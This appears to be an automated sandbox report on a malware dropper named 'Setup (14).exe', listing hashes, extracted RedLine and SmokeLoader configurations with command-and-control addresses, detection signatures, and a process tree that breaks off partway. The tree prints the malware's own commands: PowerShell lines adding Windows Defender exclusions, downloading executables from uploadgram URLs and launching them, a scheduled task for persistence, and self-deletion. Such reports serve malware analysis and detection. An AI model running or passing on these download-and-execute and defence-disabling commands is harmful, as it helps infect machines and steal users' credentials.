Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    1054s
  • max time network
    1807s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (14).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 11 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 31 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 20 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 28 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 44 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 14 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Script User-Agent 33 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 15 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2696
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2688
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        PID:2580
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:5756
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2408
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2380
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1864
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1388
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1272
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1228
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1108
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1020
                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                        2⤵
                          PID:1152
                        • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                          2⤵
                            PID:9588
                          • C:\Users\Admin\AppData\Roaming\juuijbb
                            C:\Users\Admin\AppData\Roaming\juuijbb
                            2⤵
                            • Checks SCSI registry key(s)
                            • Suspicious behavior: MapViewOfSection
                            PID:7256
                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            2⤵
                            • Drops file in System32 directory
                            • Drops file in Windows directory
                            • Checks SCSI registry key(s)
                            PID:7680
                          • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                            2⤵
                              PID:6700
                            • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                              2⤵
                                PID:2100
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                              1⤵
                                PID:348
                              • C:\Users\Admin\AppData\Local\Temp\Setup (14).exe
                                "C:\Users\Admin\AppData\Local\Temp\Setup (14).exe"
                                1⤵
                                • Checks computer location settings
                                • Modifies system certificate store
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of WriteProcessMemory
                                PID:3240
                                • C:\Users\Admin\Documents\UQYHUQbec84OHIEHKRshRFm2.exe
                                  "C:\Users\Admin\Documents\UQYHUQbec84OHIEHKRshRFm2.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2440
                                  • C:\Users\Admin\Documents\UQYHUQbec84OHIEHKRshRFm2.exe
                                    C:\Users\Admin\Documents\UQYHUQbec84OHIEHKRshRFm2.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4892
                                • C:\Users\Admin\Documents\9MxbCUyyPclXVg1L_hNKnE7E.exe
                                  "C:\Users\Admin\Documents\9MxbCUyyPclXVg1L_hNKnE7E.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2348
                                • C:\Users\Admin\Documents\OyqcZ92i3gCJJ8qYDVryMC_s.exe
                                  "C:\Users\Admin\Documents\OyqcZ92i3gCJJ8qYDVryMC_s.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2044
                                • C:\Users\Admin\Documents\Hx8AjkJ79HCXfXp1QhOYFgiA.exe
                                  "C:\Users\Admin\Documents\Hx8AjkJ79HCXfXp1QhOYFgiA.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2744
                                  • C:\Users\Admin\Documents\Hx8AjkJ79HCXfXp1QhOYFgiA.exe
                                    "C:\Users\Admin\Documents\Hx8AjkJ79HCXfXp1QhOYFgiA.exe"
                                    3⤵
                                    • Modifies data under HKEY_USERS
                                    PID:6788
                                • C:\Users\Admin\Documents\R468v1tBV1tAd_a3q_6zO0NU.exe
                                  "C:\Users\Admin\Documents\R468v1tBV1tAd_a3q_6zO0NU.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2752
                                • C:\Users\Admin\Documents\BvDb7xlrdnCS0wW9vYhSY6A7.exe
                                  "C:\Users\Admin\Documents\BvDb7xlrdnCS0wW9vYhSY6A7.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2716
                                • C:\Users\Admin\Documents\FN4N_Pk1bUAV1ptJ9RQn8Qf3.exe
                                  "C:\Users\Admin\Documents\FN4N_Pk1bUAV1ptJ9RQn8Qf3.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2732
                                • C:\Users\Admin\Documents\N0THgCitmNFcmQmE3V0BoaLB.exe
                                  "C:\Users\Admin\Documents\N0THgCitmNFcmQmE3V0BoaLB.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2496
                                  • C:\Users\Admin\AppData\Roaming\2022134.exe
                                    "C:\Users\Admin\AppData\Roaming\2022134.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    PID:4808
                                    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2944
                                  • C:\Users\Admin\AppData\Roaming\1385651.exe
                                    "C:\Users\Admin\AppData\Roaming\1385651.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:5568
                                • C:\Users\Admin\Documents\LtKgYPO4JES4G2k1jF_7SvNF.exe
                                  "C:\Users\Admin\Documents\LtKgYPO4JES4G2k1jF_7SvNF.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:3916
                                  • C:\Users\Admin\Documents\LtKgYPO4JES4G2k1jF_7SvNF.exe
                                    C:\Users\Admin\Documents\LtKgYPO4JES4G2k1jF_7SvNF.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4932
                                • C:\Users\Admin\Documents\s5Rg9SxZ_XJkVaJJQjKPJRCQ.exe
                                  "C:\Users\Admin\Documents\s5Rg9SxZ_XJkVaJJQjKPJRCQ.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3948
                                  • C:\Users\Admin\Documents\s5Rg9SxZ_XJkVaJJQjKPJRCQ.exe
                                    C:\Users\Admin\Documents\s5Rg9SxZ_XJkVaJJQjKPJRCQ.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4848
                                • C:\Users\Admin\Documents\gIttRCdDMdd27i0kH8sblMN9.exe
                                  "C:\Users\Admin\Documents\gIttRCdDMdd27i0kH8sblMN9.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:3912
                                  • C:\Users\Admin\Documents\gIttRCdDMdd27i0kH8sblMN9.exe
                                    C:\Users\Admin\Documents\gIttRCdDMdd27i0kH8sblMN9.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4908
                                • C:\Users\Admin\Documents\Y7CHpPi9urr7BXg52_AxHzrq.exe
                                  "C:\Users\Admin\Documents\Y7CHpPi9urr7BXg52_AxHzrq.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:844
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                    3⤵
                                      PID:4640
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                        4⤵
                                          PID:1580
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                          4⤵
                                            PID:680
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                            4⤵
                                              PID:8132
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                              4⤵
                                                PID:9352
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                4⤵
                                                • Blocklisted process makes network request
                                                PID:9764
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                4⤵
                                                • Blocklisted process makes network request
                                                PID:9948
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                4⤵
                                                • Blocklisted process makes network request
                                                PID:4928
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                4⤵
                                                  PID:2756
                                                  • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                    5⤵
                                                      PID:9924
                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                        "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                        6⤵
                                                          PID:7172
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                            7⤵
                                                              PID:7392
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                              7⤵
                                                                PID:3220
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                7⤵
                                                                  PID:9688
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                  7⤵
                                                                    PID:5504
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                  6⤵
                                                                    PID:9988
                                                                    • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                      7⤵
                                                                      • Drops file in System32 directory
                                                                      PID:4868
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                        8⤵
                                                                          PID:2728
                                                                          • C:\Windows\System32\Conhost.exe
                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            9⤵
                                                                              PID:9352
                                                                            • C:\Windows\system32\schtasks.exe
                                                                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                              9⤵
                                                                              • Creates scheduled task(s)
                                                                              PID:9368
                                                                          • C:\Windows\system32\services32.exe
                                                                            "C:\Windows\system32\services32.exe"
                                                                            8⤵
                                                                              PID:7624
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                9⤵
                                                                                  PID:5532
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                    10⤵
                                                                                      PID:9124
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                      10⤵
                                                                                        PID:4804
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                        10⤵
                                                                                          PID:7588
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                          10⤵
                                                                                            PID:2424
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                          9⤵
                                                                                            PID:9404
                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                              10⤵
                                                                                              • Drops file in System32 directory
                                                                                              PID:9576
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                11⤵
                                                                                                  PID:7092
                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                    12⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:9220
                                                                                                • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                  "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                  11⤵
                                                                                                    PID:5104
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                    11⤵
                                                                                                      PID:6440
                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                        12⤵
                                                                                                          PID:8700
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                  8⤵
                                                                                                    PID:4212
                                                                                                    • C:\Windows\system32\choice.exe
                                                                                                      choice /C Y /N /D Y /T 3
                                                                                                      9⤵
                                                                                                        PID:1936
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                              4⤵
                                                                                                PID:9632
                                                                                                • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                  5⤵
                                                                                                  • Adds Run key to start application
                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                  PID:8900
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                4⤵
                                                                                                • Blocklisted process makes network request
                                                                                                PID:4368
                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                  5⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:9564
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                    "{path}"
                                                                                                    6⤵
                                                                                                      PID:1356
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                      "{path}"
                                                                                                      6⤵
                                                                                                        PID:2224
                                                                                              • C:\Users\Admin\Documents\NaaK7ncJXXAZwWRi78RKI5pM.exe
                                                                                                "C:\Users\Admin\Documents\NaaK7ncJXXAZwWRi78RKI5pM.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2396
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 660
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:4132
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 696
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Program crash
                                                                                                  PID:4636
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 660
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5740
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 656
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6036
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1176
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:4228
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1120
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5168
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 1112
                                                                                                  3⤵
                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                  • Program crash
                                                                                                  PID:4448
                                                                                              • C:\Users\Admin\Documents\Mbi_GUnbisWc6zwQ0Fev8za5.exe
                                                                                                "C:\Users\Admin\Documents\Mbi_GUnbisWc6zwQ0Fev8za5.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2168
                                                                                              • C:\Users\Admin\Documents\i2mYmTsXmGXpg1Un6O9mgzJL.exe
                                                                                                "C:\Users\Admin\Documents\i2mYmTsXmGXpg1Un6O9mgzJL.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2216
                                                                                              • C:\Users\Admin\Documents\GyByXaQUNCXO0CdG1j4BM0CO.exe
                                                                                                "C:\Users\Admin\Documents\GyByXaQUNCXO0CdG1j4BM0CO.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:1584
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 764
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:3476
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 812
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5604
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 784
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6140
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 824
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5444
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 956
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:4368
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 984
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:5860
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1048
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Program crash
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  PID:4368
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1344
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6896
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1404
                                                                                                  3⤵
                                                                                                  • Program crash
                                                                                                  PID:6188
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1584 -s 1360
                                                                                                  3⤵
